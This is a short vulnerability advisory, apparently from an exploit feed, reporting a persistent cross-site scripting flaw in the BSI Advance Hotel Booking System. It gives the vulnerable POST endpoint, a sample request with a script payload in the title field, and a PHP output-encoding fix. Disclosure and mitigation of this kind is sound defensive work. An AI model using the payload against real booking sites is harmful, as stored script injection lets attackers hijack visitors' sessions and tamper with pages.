Channel: BOT24

BSI Advance Hotel Booking System Persistent XSS Vulnerability


[+] Exploit Title: BSI Advance Hotel Booking System Persistent XSS Vulnerability
[+] Exploit Author: Angelo Ruwantha
[+] Vendor: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
[+] Tested on: ArchLinux


Vulnerability
========================

[+] Method: POST

1. http://URL/hotel-booking/booking_details.php (persistent XSS)

allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=


Every parameter is injectable :)
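
Mitigation sketch for the issue above: encode every stored booking field at the point where it is written into HTML. This is an added example, not code from the vendor or from the advisory author; the function names, the table layout and the length cap are assumptions, and only the field names and the sample title value come from the request shown above.

```php
<?php
// Added example: hypothetical handling of the booking form fields named in
// the advisory. Not BSI's code; function names and rendering are assumptions.

// Field names taken from the POST body shown in the advisory.
const BOOKING_FIELDS = ['title', 'fname', 'lname', 'str_addr', 'city', 'state',
    'zipcode', 'country', 'phone', 'fax', 'email', 'payment_type', 'message'];

// Encode for an HTML text or quoted-attribute context at output time.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Keep only expected fields, force strings, and cap the length before storage.
// The 200-character cap is an assumed limit; mb_substr needs the mbstring extension.
function collect_booking(array $post, int $maxLen = 200): array
{
    $clean = [];
    foreach (BOOKING_FIELDS as $name) {
        $raw = $post[$name] ?? '';
        $raw = is_string($raw) ? trim($raw) : '';   // drop array-valued parameters
        $clean[$name] = mb_substr($raw, 0, $maxLen, 'UTF-8');
    }
    return $clean;
}

// Render stored values; every value passes through h(), none is echoed raw.
function render_booking(array $booking): string
{
    $rows = '';
    foreach ($booking as $name => $value) {
        $rows .= '<tr><th>' . h($name) . '</th><td>' . h($value) . "</td></tr>\n";
    }
    return "<table>\n" . $rows . "</table>\n";
}

// Constructed sample input: the title value from the advisory's request.
$post = ['title' => '<IMG SRC="javascript:alert(\'HelloWorld ;)\');"', 'fname' => 'Test'];
$html = render_booking(collect_booking($post));

// The stored markup is emitted entity-encoded, so the browser shows it as text.
echo $html;
```

The raw value is stored unchanged and encoded only on output, so the same record stays safe to reuse in other contexts that apply their own encoding.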




//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.



